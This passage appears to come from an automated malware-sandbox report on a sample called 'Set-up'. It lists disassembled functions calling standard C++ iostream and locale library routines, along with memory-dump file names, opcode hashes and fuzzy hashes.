                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2B9B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E901
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2E920
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2E93E
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2E9A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B808
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2B827
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2B845
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2B8A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EF2B
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EF4A
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EF68
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EFCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CF45
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2CF64
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2CF82
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2CFE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EE24
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EE43
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EE61
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EEC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BE32
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BE51
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BE6F
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BED3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: b188c68bfad91ee68731cc9db6b92582d262b182c57ed65b38371c3732609a80
                                                                                              • Instruction ID: 2f6362c62fd61ea8a2b871fd344e3427a992c6898607790a2ae4b2f4e63218f9
                                                                                              • Opcode Fuzzy Hash: b188c68bfad91ee68731cc9db6b92582d262b182c57ed65b38371c3732609a80
                                                                                              • Instruction Fuzzy Hash: D5217C71A15208AFCB05CFA8C991EDDFBB5AF58308F24405DE142B7291EB799F44DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CE3E
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2CE5D
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2CE7B
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2CEDF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 713e75190acf269ecbf9e9a5249741c2bbd31dcd679e8b4e4a3d1a5680e85356
                                                                                              • Instruction ID: 11f08f5dceed85c9ddc338d781b45aa7e10f57316d18a1b589d77991bae43896
                                                                                              • Opcode Fuzzy Hash: 713e75190acf269ecbf9e9a5249741c2bbd31dcd679e8b4e4a3d1a5680e85356
                                                                                              • Instruction Fuzzy Hash: 0321AF75A111089FCB04CFE8C981EDDBBB5AF58304F144059E141B7291E7399F04DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2ED1D
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2ED3C
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2ED5A
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2EDBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: 83ee19bd682137c6fb1fc993bd52ac2f7d07d02c9437e73841d56bb24eb0a81c
